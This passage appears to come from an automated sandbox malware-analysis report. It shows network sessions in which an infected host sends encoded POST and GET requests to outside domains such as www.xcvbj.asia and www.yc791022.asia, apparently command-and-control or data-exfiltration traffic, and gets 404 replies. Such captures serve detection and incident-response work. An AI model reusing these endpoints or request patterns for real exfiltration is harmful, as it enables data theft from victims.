                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2f 2f 44 32 75 79 63 65 46 71 44 69 34 43 31 66 70 69 58 49 49 63 73 33 68 45 44 63 74 78 54 53 6e 51 3d 3d
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm//D2uyceFqDi4C1fpiXIIcs3hEDctxTSnQ==
                                                                            Dec 3, 2024 18:59:58.550810099 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:59:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            75192.168.11.2049828149.88.81.19080
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:01.081337929 CET769OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 77 46 6c 30 36 30 76 7a 53 4a 36 63 2b 66 4f 4a 64 36 75 59 63 75 38 32 65 33 73 75 2f 70 54 4f 6f 3d
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPwFl060vzSJ6c+fOJd6uYcu82e3su/pTOo=
                                                                            Dec 3, 2024 19:00:01.416487932 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            76192.168.11.2049829149.88.81.19080
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:03.948767900 CET2578OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 6f 4c 65 35 54 6c 4e 75 51 2f 58 66 5a 34 74 6e 78 53 78 73 31 47 70 34 2b 4b 77 47 4c 39 50 74 76 51 74 6a 46 53 59 32 4d 53 75 42 75 4d 31 58 51 64 4b 5a 67 58 44 4a 78 74 45 63 32 42 46 65 49 66 77 4f 77 61 57 57 79 33 6b 50 33 63 54 4b 43 38 66 6b 51 43 76 44 57 41 78 35 6e 66 34 43 65 38 6c 36 36 6b 59 6b 65 30 7a 6c 72 46 49 44 71 78 33 44 64 6c 4d 4e 36 2b 4c 77 32 74 42 64 67 49 38 79 57 30 61 68 32 4f 6f 6a 4f 61 76 41 41 49 76 4e 65 46 2f 46 41 35 59 6a 67 55 76 47 53 48 52 61 66 54 [TRUNCATED]
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRO8G4oiWHRtKJeV2UDDPwnLmc7YMK4IkjhEhBUDix9fiA8v187yctlLLj1crDWWnCVQF5mFGFT9X91dPUtD5FV9Qv5atHN7JIbNSHSSkilVV9TZc78LqoQ057PAnDAaCoLe5TlNuQ/XfZ4tnxSxs1Gp4+KwGL9PtvQtjFSY2MSuBuM1XQdKZgXDJxtEc2BFeIfwOwaWWy3kP3cTKC8fkQCvDWAx5nf4Ce8l66kYke0zlrFIDqx3DdlMN6+Lw2tBdgI8yW0ah2OojOavAAIvNeF/FA5YjgUvGSHRafTg6v1z2qM39bUOiuKbK3KBqPudEg2c3iNSAx6m14xNeUZaIaIjWiFL9GmEbdS5JAuCRVqj/5jDlRyOeTQpWgMNVps/7uVBG91VzjeW6npKZOVC2ywRz8m1vax+MN0iYMuRDaMec9KfiJpX54nd1bP1lfxGmyG0F1PkxkG9As37QufHBJkbcSeW7syWqL8R3dOaZYiC2yWRfHR/7VZE7qi+KbePfVt+zTaQMp4iQZMVhMfAyx3i6YS5GkeGpF0Nw6BimCRMaRm+hTsermq2JgCqY0425Kk2WIil9enVic0zNTUao6WWM8paamZjEeqkJbcJVuR/Op66ReP4l7hT0jwcRVKZx4Dmonni6l0B6kKfBiRo6NjBv60HxtxgVfhX2Qm4nxB3ONeTyoNzl8nKKP0EHSGSPKQzkzPKyMuI6BIdxqF+TwUUpSR2e/iNxqYNc+71q3chZSvLuxj4dlop/hbYaL9ROTmVZ052c/gcYMzrizxeZiItpuAttNlCieG+zAKB9YhZOOoXohe1ZlC1W00jxMhaJDjpGELz0FZu/q/gM0ODjTX4jUsd94lvzEQYnaQ/jef4BY869yFD2lpXJlLfKM1vJdwijPhlB8r+asOa8oQMQMfP2TcwPma5QCRrJa1eK5udJ2qhR+b6Qk3rMSgueIkTQ1iD7FOir [TRUNCATED]
                                                                            Dec 3, 2024 19:00:03.948832035 CET5156OUTData Raw: 63 4e 39 70 33 2f 55 57 35 70 67 58 53 4e 4c 58 4c 6d 55 38 49 53 37 4a 73 31 6a 6c 57 53 71 65 46 59 30 34 71 33 4f 43 50 41 53 4b 4a 78 77 6b 4f 70 51 79 50 49 70 37 38 6e 33 6e 74 49 5a 36 57 6e 50 61 6f 45 35 63 37 35 6f 53 54 5a 50 56 70 34
                                                                            Data Ascii: cN9p3/UW5pgXSNLXLmU8IS7Js1jlWSqeFY04q3OCPASKJxwkOpQyPIp78n3ntIZ6WnPaoE5c75oSTZPVp4Lmv5YKjZLYyqWfLX2im+KollQtHIG7CQxtLz7zoSSbaliRszAtiXsCc9Ihzs3ba13LT7ZvAkQ7Mx/+FqIT4Ych0O/wGq53A5jSoshhYdRqv0WIcZvSxn/o4l4GsPnMAYoLZng7Qdy9E8jGXYvq/sdA8OulpDONOhY
                                                                            Dec 3, 2024 19:00:03.948873997 CET184OUTData Raw: 54 51 65 73 53 7a 58 42 6d 77 66 33 52 79 59 51 75 46 6d 70 5a 44 37 65 41 65 4e 45 4b 66 35 39 63 73 48 6c 68 68 42 76 73 35 2f 52 37 4e 63 7a 44 71 4d 57 70 6a 38 41 4b 71 62 72 2b 6d 4e 31 65 4f 78 75 32 6e 4c 75 77 4e 74 36 55 6b 4e 4b 72 6e
                                                                            Data Ascii: TQesSzXBmwf3RyYQuFmpZD7eAeNEKf59csHlhhBvs5/R7NczDqMWpj8AKqbr+mN1eOxu2nLuwNt6UkNKrnamKcB5YaCuFhj695Xl6NCMOXb2nkhNjjTC68EkpVv3BPBaYhdF2WDjuXEKxnvz133LtPVbZ8DpNxtVfmaozuBs51b9bI4g4lX16Q==
                                                                            Dec 3, 2024 19:00:04.296648026 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            77192.168.11.2049830149.88.81.19080
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:06.831593990 CET484OUTGET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:07.185399055 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:07 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            78192.168.11.2049831101.35.209.18380
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:12.543556929 CET758OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 71 35 69 35 42 52 6a 5a 53 67 4f 54 75 6b 35 78 35 33 30 6d 63 38 2f 37 6e 51 6a 4a 6b 4e 4f 66 62 77 3d 3d
                                                                            Data Ascii: 2O=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                            Dec 3, 2024 19:00:12.886154890 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:12 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            79192.168.11.2049832101.35.209.18380
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:15.408231974 CET778OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 6a 4a 6a 67 61 68 6d 50 50 45 47 34 61 75 45 72 6f 43 79 2f 35 2f 33 4d 6a 71 61 41 4b 74 53 4b 63 3d
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                            Dec 3, 2024 19:00:15.740709066 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            80192.168.11.2049833101.35.209.18380
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:18.272083998 CET1289OUTPOST /31pt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            Origin: http://www.yc791022.asia
                                                                            Referer: http://www.yc791022.asia/31pt/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
